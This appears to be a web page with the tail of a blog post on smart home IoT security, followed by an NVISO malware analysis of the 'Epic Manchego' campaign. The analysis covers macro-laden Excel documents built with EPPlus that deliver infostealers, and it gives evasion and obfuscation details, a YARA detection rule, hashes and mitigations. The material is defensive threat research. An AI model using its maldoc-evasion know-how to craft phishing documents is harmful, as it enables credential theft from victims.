I also noticed a significant number of mobile apps that included trackers. Most of them seemed to be for bug fixing and crash reporting, but others also included more intrusive tracking for advertising purposes.

Google Firebase Analytics and CrashLytics are likely included for crash reporting.
(Image credit: see “Reference” below)

The Verdict

So, based on all this information, what can we say about the security of the smart home devices currently available on the market? Well, for starters, in all the paragraphs above we can see there’s some good things, often followed by a ‘but’. Based on the fact that when we look at the bigger picture, devices that were properly secured on one front usually also seemed to do well in all the others, it seems to be quite a hit or miss when it comes to security. Vice versa, devices that were lacking certain security controls were usually insecure across the board. Most notably, in my results I clearly saw what security professionals already knew: security is a complete package. You simply can’t just cover one part and leave the other aspects of your product exposed. For products that came from manufacturers that understood this, I saw known to be secure network protocols, strong authentication options and user friendliness that made sure security was taken care of by default with little effort required from the consumer. The other products often had security as a mere afterthought: something that could be enabled if the user dug deep into the app menus, or maybe even not at all.

What can we do?

Now that we know it’s a hit or miss with these smart home devices, how can we make the right decisions in the store and make sure we don’t end up with one of the bad apples? Is it just a matter of luck, or can we steer the odds in our favour?

Luckily, there are a few things you can look out for; price is one of them, but – as we have already shown in these previous blog posts here and here  – should never be your only indicator. I found that brand recognition is an important factor in the level of attention the manufacturer will pay to security of their device. If a brand is well known and needs to uphold their good reputation to stay in business, they will also spend more time on fixing security flaws in the future, even after their product is already out for some time. And that brings me to the next point: automatic updates.

Even if you have a device that is secure today, if it’s never updated in the upcoming years it will eventually become vulnerable. Therefore, another good indication of security is the presence of updates. Ideally, automatic updates that are pushed to the device by the vendor without the need for user interaction, as we are probably all guilty of deferring updates out of convenience until it’s too late.

Afterthoughts and looking ahead

The overall security of devices on the market seems to be a hit or miss. Currently there are not many indicators consumers can look for when buying a device, but the combination of price, brand recognition and the presence of security updates can already give a general guideline on which device will be a good bet. If we want to get a clearer overview of the actual security of smart home IoT devices, an in-depth manual security assessment is needed because automated tools provide inaccurate or unsatisfying results.

Stay tuned for Part 2 of this series, in which I’ll be talking about smart home devices and privacy!


This research was conducted as part of the author’s thesis dissertation submitted to gain his Master of Science: Computer Science Engineering at KU Leuven and device purchases were funded by NVISO labs. The full paper is available on KU Leuven libraries.

Reference

[1] Bellemans Jonah. June 2020. The state of the market: A comparative study of IoT device security implementations. KU Leuven, Faculteit Ingenieurswetenschappen.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their Cyber Security Strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Epic Manchego – atypical maldoc delivery brings flurry of infostealers

1 September 2020 at 11:33
By: NVISO

In July 2020, NVISO detected a set of malicious Excel documents, also known as “maldocs”, that deliver malware through VBA-activated spreadsheets. While the malicious VBA code and the dropped payloads were something we had seen before, it was the specific way in which the Excel documents themselves were created that caught our attention.

The creators of the malicious Excel documents used a technique that allows them to create macro-laden Excel workbooks, without actually using Microsoft Office. As a side effect of this particular way of working, the detection rate for these documents is typically lower than for standard maldocs.

This blog post provides an overview of how these malicious documents came to be. In addition, it briefly describes the observed payloads and finally closes with recommendations as well as indicators of compromise to help defend your organization from such attacks.

Key Findings (TL;DR)

  • The malicious Microsoft Office documents are created using the EPPlus software rather than Microsoft Office Excel, these documents may fly under the radar as it differs from a typical Excel document;
  • NVISO assesses with medium confidence that this campaign is delivered by a single threat actor based on the limited number of documents uploaded to services such as VirusTotal, and the similarities in payloads delivery throughout this campaign;
  • The payloads that have been observed up to the date of the release of this post, have been, for the most part, so called information stealers with the intention of harvesting passwords from browsers, email clients, etc.;
  • The payloads stemming from these documents have evolved only slightly in terms of obfuscation and masquerading. This is another indication of a single actor who is slowly evolving their technical prowess.

Analysis

The analysis section below is divided in two parts and refers to a specific link in the infection chain.

Malicious document analysis

In an earlier blog post, we wrote about “VBA Purging”[1], which is a technique to remove compiled VBA code from VBA projects. We were interested to see if any malicious documents found in-the-wild were adopting this technique (it lowers the initial detection rate of antivirus products). This is how we stumbled upon a set of peculiar malicious documents.

At first, we thought they were created with Excel, and were then VBA purged. But closer examination leads us to believe that these documents are created with a .NET library that creates Office Open XML (OOXML) spreadsheets. As stated in our VBA Purging blog post, Office documents can also lack compiled VBA code when they are created with tools that are totally independent from Microsoft Office. EPPlus is such a tool. We are familiar with this .NET library, as we have been using it since a couple of years to create malicious documents (“maldocs”) for our red team and penetration testers.

When we noticed that the maldocs had no compiled code, and were also missing Office metadata, we quickly thought about EPPlus. This library also creates OOXML files without compiled VBA code and without Office metadata.

The OOXML file format is an Open Packaging Conventions (OPC) format: a ZIP container with mainly XML files, and possibly binary files (like pictures). It was first introduced by Microsoft with the release of Office 2007. OOXML spreadsheets use extension .xlsx and .xlsm (for spreadsheets with macros).

When a VBA project is created with EPPlus, it does not contain compiled VBA code. EPPlus has no methods to create compiled code: the algorithms to create compiled VBA code are proprietary to Microsoft.

The very first malicious document we detected was created on 22nd of June 2020, and since then 200+ malicious documents were found over a period of 2 months. The actor has increased their activity in the last weeks, as now we see more than 10 new malicious documents on some days.

Figure 1 – Unique maldocs observed per day

The maldocs discovered over the course of two months have many properties that are quite different from the properties of documents created with Microsoft Office. We believe this is the case because they are created with a tool independent from Microsoft Excel. Although we don’t have a copy of the exact tool used by the threat actor to create these malicious documents, the malicious documents created by this tool have many properties that convince us that they were created with the aforementioned EPPlus software.

Some of EPPlus’ properties include, but are not limited to:

  • Powerful and versatile library: not only can it create spreadsheets containing a VBA project, but that project can also be password protected and/or digitally signed. It does not rely on Microsoft Office. It can also run on Mono (cross platform, open-source .NET).
  • OOXML files created with EPPlus have some properties that distinguish them from OOXML files created with Excel. Here is an overview:
    • ZIP Date: every file included in a ZIP file has a timestamp (DOSDATE and DOSTIME field in the ZIPFILE record). For documents created (or edited) with Microsoft Office, this timestamp is always 1980-01-01 00:00:00 (0x0021 for DOSDATE and 0x0000 for DOSTIME). OOXML files created with EPPlus have a timestamp that corresponds to the creation time of the document. Usually, that timestamp is the same for all files inside the OOXML files, but due to execution delays, there can be a difference of 2 seconds between timestamp. 2 seconds is the resolution of the DOSTIME format.

Figure 2 – DOSTIME difference (left: EPPlus created file)

  • Extra ZIP records: a typical ZIP file is composed of ZIP file records (magic 50 4B 03 04) with metadata for the file, and the (compressed) file content. Then there are ZIP directory entries (magic 50 4B 01 02) followed by a ZIP end-of-directory record (magic 50 4B 05 06). Microsoft Office creates OOXML files containing these 3 ZIP record types. EPPlus creates OOXML files containing 4 ZIP records: it also includes a ZIP data description record (magic 50 4B 07 08) after each ZIP file record.

Figure 3 – Extra ZIP records (left: EPPlus created file)

  • Missing Office document metadata: an OOXML document created with Microsoft Office contains metadata (author, title, …). This metadata is stored inside XML files found inside the docProps folder. By default, documents created with EPPlus don’t have metadata: there is no docProps folder inside the ZIP container.

Figure 4 – Missing metadata (left: EPPlus created file)

  • VBA Purged: OOXML files with a VBA project created with Microsoft Office contain an OLE file (vbaProject.bin) with streams containing the compiled VBA code and the compressed VBA source code. Documents created with EPPlus do not contain compiled VBA code, only compressed VBA source code. This means that:
    • The module streams only contain compressed VBA code
    • There are no SRP streams (SRP streams contain implementation-specific and version-dependent compile code, theire name starts with __SRP_)
    • The _VBA_PROJECT stream does not contain compiled VBA code. In fact, the content of the _VBA_PROJECT stream is hardcoded in the EPPlus source code: it’s always CC 61 FF FF 00 00 00.

Figure 5 – Hardcoded stream content (left: EPPlus created file)

In addition to the above, we have also observed some properties of the VBA source code that hints at the use of a creation tool based on a library like EPPlus.

There are a couple of variants to the VBA source code used by the actor (some variants use PowerShell to download the payload, others use pure VBA code). But all these variants contain a call to a loader function with one argument, a string with the URL (either BASE64 or hexadecimal encoded). Like this (hexadecimal example):

Loader”68 74 74 70 …”

Do note that there is no space character between the function name and the argument: there is no space between Loader and ”68 74 74 70 …”.

This is an indication that the VBA code was not entered through the VBA EDI in Office: when you type a statement like this, without space character, the VBA EDI will automatically add a space character for you (even if you copy/paste the code). The absence of this space character divulges that this code was not entered through the VBA EDI, but likely via a library such as EPPlus.

To illustrate these differences in properties, we show examples with one of our internal tools (ExcelVBA) using the EPPlus library. We create a vba.xlsm file with the vba code in text file vba.txt using our tool ExcelVBA, and show some of its properties.:

Figure 6 – NVISO created XLSM file using the EPPlus library

Figure 7 – Running oledump.py reveals this document was created using the EPPlus library

Some of the malicious documents contain objects that clearly have been created with EPPlus, using some of the example code found on the EPPlus Wiki. We illustrate this with the following example (the first document in this campaign):

Filename: Scan Order List.xlsm
MD5: 8857fae198acd87f7581c7ef7227c34d
SHA256: 8a863b5f154e1ddba695453fdd0f5b83d9d555bae6cf377963c9009c9fa6c9be
File Size: 5.77 KB (5911 bytes)
Earliest Contents Modification: 2020-06-22 14:01:46

This document contains a drawing1.xml object (a rounded rectangle) with this name: name=”VBASampleRect”.

Figure 8 – zipdump of maldoc

Figure 9 – Selecting the drawing1.xml object reveals the name

This was created with sample code found on the EPPlus Wiki[2]:

Figure 10 – EPPlus sample code, clearly showing the similarities

Noteworthy is that all maldocs we observed have their VBA project protected with a password. It is interesting to note that the VBA code itself is not encoded/encrypted, it is stored in cleartext (although compressed) [3]. When a document with a password protected VBA project is opened, the VBA macros will execute without the password: the user does not need to provide the password. The password is only required to view the VBA project inside the VBA IDE (Integrated Development Environment):

Figure 11 – Password prompt for viewing the VBA project

We were not able to recover these passwords. We used John the Ripper with the rockyou.txt password list[4], and Hashcat with a small ASCII brute-force attack.

Although each malicious document is unique with its own VBA code, with more than 200 samples analyzed to date, we can generalize and abstract all this VBA code to just a handful of templates. The VBA code will either use PowerShell or ActiveX objects to download the payload. The different strings are encoded using either hexadecimal, BASE64 or XOR-encoding; or a combination of these encodings. A Yara rule to detect these maldocs is provided at the end of this blog post for identification and detection purposes.

Payload analysis

As mentioned in the previous section, via the malicious VBA code, a second-stage payload is downloaded from various websites. Each second-stage executable created by its respective malicious document acts as dropper for the final payload. In order to thwart detection mechanisms such as antivirus solutions, a variety of obfuscation techniques are leveraged which are however not advanced enough to hide the malicious intent.  The infrastructure used by the threat actor appears to mainly comprise compromised websites.

Popular antivirus solutions such as those listed on VirusTotal, shown in Figure 12, commonly identify the second-stage executables as “AgentTesla”. While leveraging VirusTotal for malware identification is not an ideal method, it does display how simple obfuscation can result in an incorrect classification. Throughout this analysis, we’ll explain how only few of these popular detections turned out to be accurate.

Figure 12: VirusTotal “AgentTesla” mis-identification.

The different obfuscation techniques we observed outline a pattern common to all second-stage executables of operation Epic Manchego. As can be observed in Figure 13, the second stage will dynamically load a decryption DLL. This DLL component then proceeds to extract additional settings and a third-stage payload before transferring the execution to the final payload, typically an information stealer.

Figure 13: Operation Epic Manchego final stage delivery mechanism.

Although the above obfuscation pattern is common to all samples, we have observed an evolution in its complexity as well as a wide variation in perhaps more opportunistic techniques.

  Early Variants Recent Variants
DLL Component Obfuscation Obfuscated base64 encoding Empty fixed-size structures
Final Payload Obfuscation Single-PNG encoding Multi-BMP dictionary encoding
Opportunistic Obfuscation Name randomisation Run-time method resolving, Goto flow-control, …

Table 1 – Variant comparison

A common factor of the operation’s second-stage samples is the usage of steganography to obfuscate their malicious intent. Figure 14 identifies a partial configuration used in recent variants where a dictionary of settings, including the final payload, is encoded into hundreds of images as part of the second-stage’s embedded resources.

Figure 14: Partial dictionary encoded in a BMP image

The image itself is part of the following second-stage sample which has the following properties:

Filename: crefgyu.exe
MD5: 7D71F885128A27C00C4D72BF488CD7CC
SHA256: C40FA887BE0159016F3AFD43A3BDEC6D11078E19974B60028B93DEF1C2F95726
File Size: 761 KB (779.776 bytes)
Compilation Timestamp: 2020-03-09 16:39:33

Noteworthy is the likelihood that the obfuscation process is not built by the threat actors themselves. A careful review of the second-stage steganography decoding routine uncovers how most samples mistakenly contain the final payload twice. In the following representation (Figure 15) of the loader’s configuration we can see that its payload is indeed duplicated. The complexity of the second- and third-stage payloads furthermore tend to suggest the operation involves different actors as the initial documents reflect a less experienced actor.

Throughout the multiple dictionary-based variants analyzed we furthermore noticed that, regardless of the final payload, similar keys were used as part of the settings. All dictionaries contained the final payload as “EpkVBztLXeSpKwe” while some, as seen in Figure 15, also contained the same value as “PXcli.0.XdHg”. This suggests a possible builder for payload delivery, which may be used by multiple actors.

Figure 15: Stage 2 decoded dictionary

Within the manually analyzed dataset of 30 distinct dictionary-based second stages, 19 unique final payloads were observed. From these, the “Azorult” stealer accounts for 50% of the variant’s delivery (Figure 16). Other payloads include “AgentTesla”, “Formbook”, “Matiex” and “njRat”, which are all well-documented already. Both “Azurult” and “njRAT” have a noticeable reusage rate.

Figure 16: Dictionary-based payload classification and (re-)usage of samples with trimmed hashes

Our analysis of droppers and respective payloads uncovered a common pattern in obfuscation routines. While opportunistic obfuscation methods may evolve, the delivered payloads remain part of a rather limited set of malware families.

Targeting

A small number of the malicious documents we retrieved from VirusTotal were uploaded together with the phishing email itself. Analysis of these emails can shed some light on the potential targets of this actor. Due to the limited number of source emails retrieved, it was not possible to identify a clear pattern based on the victims. In the 6 emails we were able to retrieve, recipients were in the medical equipment sector, aluminium sector, facility management and a vendor for custom made press machines.

When looking into the sender domains, it appears most emails are sent from legitimate companies. Having used the “Have I Been Pwned”[5] service to confirm if any of the email addresses were known to be compromised, turned up with no results. This leaves us to wonder whether the threat actor was able to leverage these accounts during an earlier infection or whether a different party supplied them. Regardless of who compromised the accounts, it appears the threat actor primarily uses legitimate corporate email accounts to initiate the phishing campaign.

Looking at both sender and recipient, there doesn’t appear to be a pattern we can deduce to identify potential new targets. There does not seem to be a specific sector targeted nor are the sending domains affiliated with each other.

Both body (content) and subject of the emails relate to a more classic phishing scheme, for example, a request to initiate business for which the attachment provides the ‘details’. An overview of subjects observed can be seen below, note some subjects have been altered by the respective mail gateways:

  • Re: Quotation required/
  • Quote volume and weight for preferred
  • *****SPAM***** FW:Offer_10044885_[companyname]_2_09_2020.xlsx*
  • [SUSPECTED SPAM] Alternatives for Request*
  • Purchase Order Details
  • Quotation Request

Figure 17 – Sample phishing email

This method of enticing users to open the attachments is nothing new and does not provide a lot of additional information to pinpoint the campaign targeting any specific organisation or verticals.

However, leveraging public submissions of the maldocs through VirusTotal, we clustered over 200 documents, which allowed us to rank 27 countries by submission count without differentiating between uploads possibly performed through VPNs. As shown in Figure 18, areas such as the United States, Czech Republic, France, Germany, as well as China, account for the majority of targeted regions.

Figure 18 – Geographical distribution of VT submissions

When analysing the initial documents for targeted regions, we primarily identified English, Spanish, Chinese and Turkish language-based images.

Figure 19 – Maldoc content in Chinese, Turkish, Spanish and English respectively

Some images however contained an interesting detail: some of the document properties are in Cyrillic, and this regardless of the image’s primary language.

Although the Cyrillic Word settings were observed in multiple images, a new maldoc detected at time of writing this blog post piqued our interest, as it appears to be the first one to explicitly impersonate a healthcare sector member (“Ohiohealth Hardin Memorial Hospital”), as can be observed in Figure 20. Note also the settings as described above: СТРАНИЦА 1 ИЗ 1; which means page 1 of 1.

Figure 20 – Maldoc content impersonating “Ohiohealth Hardin Memorial Hospital” with Cyrillic Word settings

This Microsoft Excel document has the following details:

Filename: 새로운 주문 _2608.xlsm (Korean: New order _2608.xlsm)
MD5: 551b5dd7aff4ee07f98d11aac910e174
SHA256: 45cab564386a568a4569d66f6781c6d0b06a9561ae4ac362f0e76a8abfede7bb
File Size: 5.77 KB (5911 bytes)
Earliest Contents Modification: 2020-06-22 14:01:46

While the template from said hospital may have been simply discovered on the web and consequently used by the threat actor, this surprising change in modus operandi does appear to align with the actor’s constant evolution observed since the start of tracking.

 

Assessment

Based on the analysis, NVISO assesses the following:

  • The threat actor observed has worked out a new method to create malicious Office documents with a way to at least slightly reduce detection mechanisms;
  • The actor is likely experimenting and evolving its methodology in which malicious Office documents are created, potentially automating the workflow;
  • While the targeting seems rather limited for now, it’s possible these first runs were intended for testing rather than a full-fledged campaign;
  • Recent uptick in detections submitted to VirusTotal confirms the actor may be ramping up their operations;
  • While the approach to create malicious documents is unique, the methodologies for payload delivery as well as actual payloads are not, and should be stopped or detected by modern technologies;
  • Of interest is a recent blog post published by Xavier Mertens on the SANS diary Tracking A Malware Campaign Through VT[6]. It appears another security researcher has also been tracking these documents, however, they have extracted the VBA code from the maldocs and uploaded that portion. These templates relate to the PowerShell way of downloading the next stage.

In conclusion, NVISO assesses this specific malicious Excel document creation technique is likely to be observed more in the wild, albeit missed by email gateways or analysts, as payload analysis is often considered more interesting. However, blocking and detection of these types of novelties, such as the maldoc creation described in this blog, enables organizations to detect and respond quicker in case an uptick or similar campaign occurs. The recommendations section provides ruling and indicators as a means of detection.

Recommendations

  • Filter email attachments and emails sent from outside your organization;
  • Implement robust endpoint detect and respond defenses;
  • Create phishing awareness trainings and perform a phishing exercise.

 

YARA

We provide the following rule to implement in your detection mechanisms for use in further hunting missions.

rule xlsm_without_metadata_and_with_date {
    meta:
        description = "Identifies .xlsm files created with EPPlus"
        author = "NVISO (Didier Stevens)"
        date = "2020-07-12"
        reference = "http://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers"
        tlp = "White"
    strings:
        $opc = "[Content_Types].xml"
        $ooxml = "xl/workbook.xml"
        $vba = "xl/vbaProject.bin"
        $meta1 = "docProps/core.xml"
        $meta2 = "docProps/app.xml"
        $timestamp = {50 4B 03 04 ?? ?? ?? ?? ?? ?? 00 00 21 00}
    condition:
        uint32be(0) == 0x504B0304 and ($opc and $ooxml and $vba)
        and not (any of ($meta*) and $timestamp)
}

This rule will match documents with VBA code created with EPPlus, even if they are not malicious. We had only a couple of false positives with this rule (documents created with other benign software), and quite some corrupt samples (incomplete ZIP files).

 

INDICATORS OF COMPROMISE (IOCs)

Indicators of compromise can be found on our Github page here.

MITRE ATT&CK MAPPING

  • Initial Access:
    • T1566.001 Phishing: Spearphishing Attachment
  • Execution:
    • T1204.002 User Execution: Malicious File
  • Defense Evasion:
    • T1140 Deobfuscate/Decode Files or Information
    • T1036.005 Masquerading: Match Legitimate Name or Location
    • T1027.001 Obfuscate Files or Information: Binary Padding
    • T1027.002 Obfuscate Files or Information: Software Packing
    • T1027.003 Obfuscate Files or Information: Steganography
    • T1055.001 Process Injection: DLL Injection
    • T1055.002 Process Injection: PE Injection
    • T1497.001 Virtualization/Sandbox Evasion: System Checks

 

Authors

This blog post was created based on the collaborative effort of :

❌